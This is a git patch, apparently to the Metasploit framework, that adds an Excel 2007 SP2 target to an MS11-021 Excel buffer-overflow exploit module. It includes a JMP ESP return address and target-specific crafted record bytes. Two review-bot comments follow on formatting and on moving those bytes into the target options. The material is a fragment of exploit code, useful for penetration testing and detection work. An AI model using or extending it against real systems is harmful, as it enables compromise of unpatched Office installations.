From 43a22d3fa0580fc3d4c34c5b55c8b1c908ef9658 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Sun, 6 Nov 2011 17:33:29 +0000
Subject: [PATCH] Add Office 2007 SP2 target, thanks Juan
git-svn-id: file:///home/svn/framework3/trunk@14171 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/fileformat/ms11_021_xlb_bof.rb | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
index 8fa73c09ed..78cb0aaa6c 100644
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -55,9 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote
 'Platform' => 'win',
 'Targets' =>
 [
- # JMP ESP in EXCEL (Office 2007)
 # Win XP SP3 (Vista and 7 will try to repair the file)
- ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }],
+ ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)
+ ['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel
 ],
 'Privileged' => false,
 'DisclosureDate' => "Aug 9 2011",
@@ -81,7 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 record = ''
 record << "\xa7\x00" #record type
 record << "\x04\x00" #record length
- record << "\xb0\x0f\x0c\x00" #data
+ if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2
+ record << "\xb0\x0d\x0c\x00" #data
+ else
+ record << "\xb0\x0f\x0c\x00" #data
+ end
 # Offset 1564
 continue_record = ''
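Review bot: The two rows in `'Targets'` are now written in different styles: `{'Ret' => 0x3006A48D }` against `{'Ret'=>0x3006b185}`, upper-case against lower-case hex, and `# JMP ESP in EXCEL (Office 2007)` against `#JMP ESP in excel`. Neither trailing comment records which Excel build the address was verified on, and a hard-coded address only holds for one exact binary, so anyone validating the module against a lab image or building detection coverage for it has to rediscover that. I would format the second row like the first and extend both comments with the verified build, e.g. `# JMP ESP in EXCEL (Office 2007 SP2, file version <VERSION>)`.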
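Review bot: Choosing the record bytes with `target.name =~ /Excel 2007 SP2/` ties behaviour to the display string of the target, so rewording that entry in `'Targets'` (first hunk) silently sends the SP2 target down the `else` branch with no error. The per-target value belongs in the target's options hash next to `'Ret'` and should be read back by key, e.g. `record << target['RecordData']` (key name illustrative). That removes the `if`/`else` and makes a target that lacks the value raise instead of inheriting another target's bytes. The `#data` comment on both branches should also say what the differing second byte stands for. The enclosing method starts and ends outside the hunk.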